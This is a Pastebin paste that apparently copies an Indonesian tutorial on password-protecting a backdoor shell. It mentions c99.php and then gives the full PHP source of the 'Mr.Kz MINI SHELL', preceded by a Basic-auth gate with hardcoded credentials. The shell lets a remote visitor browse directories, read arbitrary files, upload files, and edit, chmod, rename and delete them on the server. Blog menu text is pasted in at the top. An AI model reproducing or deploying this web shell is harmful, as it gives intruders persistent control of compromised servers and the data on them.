API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Dec 2nd, 2018
126
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 12.50 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2.  
  3. Home
  4. Photography
  5. 404
  6. Action
  7. Back
  8. Tags
  9. Sub Menu
  10. Back
  11. Menu 1
  12. Menu 2
  13. Menu 3
  14. Live
  15. Fashion
  16. Adventures
  17. Travel
  18. Back
  19. Blogger
  20. Back
  21. YOUR ADS HERE
  22. Home Tutorial Teknologi Cara Memberi Password Di Shell Sendiri
  23. Cara Memberi Password Di Shell Sendiri
  24. Abyan Z 00.42
  25.  
  26.  
  27.  
  28.  
  29. misalnya saya akan memberi password pada shell backdoor c99.php
  30. yang mempunyai script
  31.  
  32.  
  33.  
  34. lalu Masukan script berikut tepat di bawah <?php
  35. // --- pop-up
  36.  
  37. $user = "zall";
  38.  
  39. $pass = "zall";
  40.  
  41. if (($_SERVER["PHP_AUTH_USER"] != $user) || (($_SERVER["PHP_AUTH_PW"]) != $pass))
  42.  
  43. {
  44.  
  45. header("WWW-Authenticate: Basic realm=\"dvildance was here\"");
  46.  
  47. header("HTTP/1.0 401 Unauthorized");
  48.  
  49. exit();
  50.  
  51. }
  52.  
  53. // --- php shell
  54. error_reporting(0);
  55. set_time_limit(0);
  56.  
  57. if(get_magic_quotes_gpc()){
  58. foreach($_POST as $key=>$value){
  59. $_POST[$key] = stripslashes($value);
  60. }
  61. } echo '<!DOCTYPE HTML>
  62. <html>
  63. <head>
  64. <title>Mr.Kz</title>
  65. <link href="" rel="stylesheet" type="text/css">
  66. <style>
  67. body {
  68. font-family: "tahoma", cursive;
  69. background-color: black;
  70. color:cyan;
  71. }
  72. #content tr:hover{
  73. text-shadow:0px 0px 10px;
  74. }
  75. #content .first{
  76. background-color: green;
  77. }
  78. table{
  79. border: 1px #000000 dotted;
  80. }
  81. a{
  82. color:cyan;
  83. text-decoration: none;
  84. }
  85. a:hover{
  86. color:white;
  87. text-shadow:0px 0px 10px transparent;
  88. }
  89. input,select,textarea{
  90. border: 1px white solid;
  91. -moz-border-radius: 5px;
  92. -webkit-border-radius:5px;
  93. border-radius:5px;
  94. }
  95. </style>
  96. </head>
  97. <body>
  98. <h1>
  99. <center>
  100. <font color="cyan">Mr.Kz MINI SHELL</font>
  101. </center>
  102. </h1>
  103. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  104. <tr>
  105. <td>
  106. <font color="white">Current Dir :</font> ';
  107.  
  108. if(isset($_GET['path'])){
  109. $path = $_GET['path'];
  110. } else{
  111. $path = getcwd();
  112. }
  113. $path = str_replace('\\','/',$path);
  114. $paths = explode('/',$path);
  115.  
  116. foreach($paths as $id=>$pat){
  117. if($pat == '' && $id == 0){
  118. $a = true;
  119. echo '<a href="?path=/">/</a>';
  120. continue;
  121. }
  122. if($pat == '') continue;
  123. echo '<a href="?path=';
  124. for($i=0;$i<=$id;$i++){
  125. echo "$paths[$i]";
  126. if($i != $id) echo "/";
  127. }
  128. echo '">'.$pat.'</a>/';
  129. } echo '</td></tr><tr><td>';
  130. if(isset($_FILES['file'])){
  131. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
  132. echo '<font color="cyan">Upload Succeeded</font><br />';
  133. } else{
  134. echo '<font color="red">Upload Failed</font><br/>';
  135. }
  136. } echo '<form enctype="multipart/form-data" method="POST">
  137. <font color="white">File Upload :</font> <input type="file" name="file" />
  138. <input type="submit" value="upload" />
  139. </form>
  140. </td>
  141. </tr>';
  142.  
  143. if(isset($_GET['filesrc'])){
  144. echo "<tr><td>Current File : ";
  145. echo $_GET['filesrc'];
  146. echo '</tr></td></table><br />';
  147. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
  148. } elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
  149. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  150. if($_POST['opt'] == 'chmod'){
  151. if(isset($_POST['perm'])){
  152. if(chmod($_POST['path'],$_POST['perm'])){
  153. echo '<font color="cyan">Change Permission Successful</font><br/>';
  154. } else{
  155. echo '<font color="red">Change Permission Failed</font><br />';
  156. }
  157. } echo '<form method="POST">
  158. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
  159. <input type="hidden" name="path" value="'.$_POST['path'].'">
  160. <input type="hidden" name="opt" value="chmod">
  161. <input type="submit" value="Go" />
  162. </form>';
  163. } elseif($_POST['opt'] == 'rename'){
  164. if(isset($_POST['newname'])){
  165. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  166. echo '<font color="cyan">Rename Successfully</font><br/>';
  167. } else{
  168. echo '<font color="red">Rename Failed</font><br />';
  169. }
  170. $_POST['name'] = $_POST['newname'];
  171. } echo '<form method="POST">
  172. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
  173. <input type="hidden" name="path" value="'.$_POST['path'].'">
  174. <input type="hidden" name="opt" value="rename">
  175. <input type="submit" value="Go" />
  176. </form>';
  177. } elseif($_POST['opt'] == 'edit'){
  178. if(isset($_POST['src'])){
  179. $fp = fopen($_POST['path'],'w');
  180. if(fwrite($fp,$_POST['src'])){
  181. echo '<font color="cyan">Successfully Edit File</font><br/>';
  182. } else{
  183. echo '<font color="red">Failed to Edit File</font><br/>';
  184. } fclose($fp);
  185. } echo '<form method="POST">
  186. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
  187. <input type="hidden" name="path" value="'.$_POST['path'].'">
  188. <input type="hidden" name="opt" value="edit">
  189. <input type="submit" value="Save" />
  190. </form>';
  191. } echo '</center>';
  192. } else{
  193. echo '</table><br/><center>';
  194. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
  195. if($_POST['type'] == 'dir'){
  196. if(rmdir($_POST['path'])){
  197. echo '<font color="cyan">Deleted Directory</font><br/>';
  198. } else{
  199. echo '<font color="red">Directory Failed Deleted</font><br/>';
  200. }
  201. } elseif($_POST['type'] == 'file'){
  202. if(unlink($_POST['path'])){
  203. echo '<font color="cyan">Deleted Files</font><br/>';
  204. } else{
  205. echo '<font color="red">File Failed Deleted</font><br/>';
  206. }
  207. }
  208. } echo '</center>';
  209. $scandir = scandir($path);
  210. echo '<div id="content">
  211. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  212. <tr class="first">
  213. <td>
  214. <center>Name</peller></center>
  215. </td>
  216. <td>
  217. <center>Size</peller></center>
  218. </td>
  219. <td>
  220. <center>Permission</peller></center>
  221. </td>
  222. <td>
  223. <center>Modify</peller></center>
  224. </td>
  225. </tr>';
  226.  
  227. foreach($scandir as $dir){
  228. if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
  229. echo '<tr>
  230. <td><a href="?path='.$path.'/'.$dir.'">'.$dir.'</a></td>
  231. <td><center>--</center></td>
  232. <td><center>';
  233. if(is_writable($path.'/'.$dir)) echo '<font color="cyan">';
  234. elseif(!is_readable($path.'/'.$dir)) echo '<font color="red">';
  235. echo perms($path.'/'.$dir);
  236. if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font>';
  237. echo '</center></td>
  238. <td><center><form method="POST" action="?option&path='.$path.'">
  239. <select name="opt">
  240. <option value="">Select</option>
  241. <option value="delete">Delete</option>
  242. <option value="chmod">Chmod</option>
  243. <option value="rename">Rename</option>
  244. </select>
  245. <input type="hidden" name="type" value="dir">
  246. <input type="hidden" name="name" value="'.$dir.'">
  247. <input type="hidden" name="path" value="'.$path.'/'.$dir.'">
  248. <input type="submit" value=">">
  249. </form></center></td>
  250. </tr>';
  251. } echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
  252.  
  253. foreach($scandir as $file){
  254. if(!is_file($path.'/'.$file)) continue;
  255. $size = filesize($path.'/'.$file)/1024;
  256. $size = round($size,3);
  257. if($size >= 1024){
  258. $size = round($size/1024,2).' MB';
  259. } else{
  260. $size = $size.' KB';
  261. } echo '<tr>
  262. <td><a href="?filesrc='.$path.'/'.$file.'&path='.$path.'">'.$file.'</a></td>
  263. <td><center>'.$size.'</center></td>
  264. <td><center>';
  265.  
  266. if(is_writable($path.'/'.$file)) echo '<font color="cyan">';
  267. elseif(!is_readable($path.'/'.$file)) echo '<font color="red">';
  268. echo perms($path.'/'.$file);
  269. if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>';
  270. echo '</center></td>
  271. <td><center><form method="POST" action="?option&path='.$path.'">
  272. <select name="opt">
  273. <option value="">Select</option>
  274. <option value="delete">Delete</option>
  275. <option value="chmod">Chmod</option>
  276. <option value="rename">Rename</option>
  277. <option value="edit">Edit</option>
  278. </select>
  279. <input type="hidden" name="type" value="file">
  280. <input type="hidden" name="name" value="'.$file.'">
  281. <input type="hidden" name="path" value="'.$path.'/'.$file.'">
  282. <input type="submit" value=">">
  283. </form></center></td>
  284. </tr>';
  285. } echo '</table></div>';
  286. } echo "<br><center>Copyright © 2K19 - </body></html>" . (int)date('Y'). " Mr.Kz";
  287.  
  288. function perms($file){
  289. $perms = fileperms($file);
  290. if (($perms & 0xC000) == 0xC000) {
  291. // Socket
  292. $info = 's';
  293. } elseif (($perms & 0xA000) == 0xA000) {
  294. // Symbolic Link
  295. $info = 'l';
  296. } elseif (($perms & 0x8000) == 0x8000) {
  297. // Regular
  298. $info = '-';
  299. } elseif (($perms & 0x6000) == 0x6000) {
  300. // Block special
  301. $info = 'b';
  302. } elseif (($perms & 0x4000) == 0x4000) {
  303. // Directory
  304. $info = 'd';
  305. } elseif (($perms & 0x2000) == 0x2000) {
  306. // Character special
  307. $info = 'c';
  308. } elseif (($perms & 0x1000) == 0x1000) {
  309. // FIFO pipe
  310. $info = 'p';
  311. } else {
  312. // Unknown
  313. $info = 'u';
  314. }
  315. // Owner
  316. $info .= (($perms & 0x0100) ? 'r' : '-');
  317. $info .= (($perms & 0x0080) ? 'w' : '-');
  318. $info .= (($perms & 0x0040) ?
  319. (($perms & 0x0800) ? 's' : 'x' ) :
  320. (($perms & 0x0800) ? 'S' : '-'));
  321. // Group
  322. $info .= (($perms & 0x0020) ? 'r' : '-');
  323. $info .= (($perms & 0x0010) ? 'w' : '-');
  324. $info .= (($perms & 0x0008) ?
  325. (($perms & 0x0400) ? 's' : 'x' ) :
  326. (($perms & 0x0400) ? 'S' : '-'));
  327. // World
  328. $info .= (($perms & 0x0004) ? 'r' : '-');
  329. $info .= (($perms & 0x0002) ? 'w' : '-');
  330. $info .= (($perms & 0x0001) ?
  331. (($perms & 0x0200) ? 't' : 'x' ) :
  332. (($perms & 0x0200) ? 'T' : '-'));
  333. return $info;
  334. }
  335. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!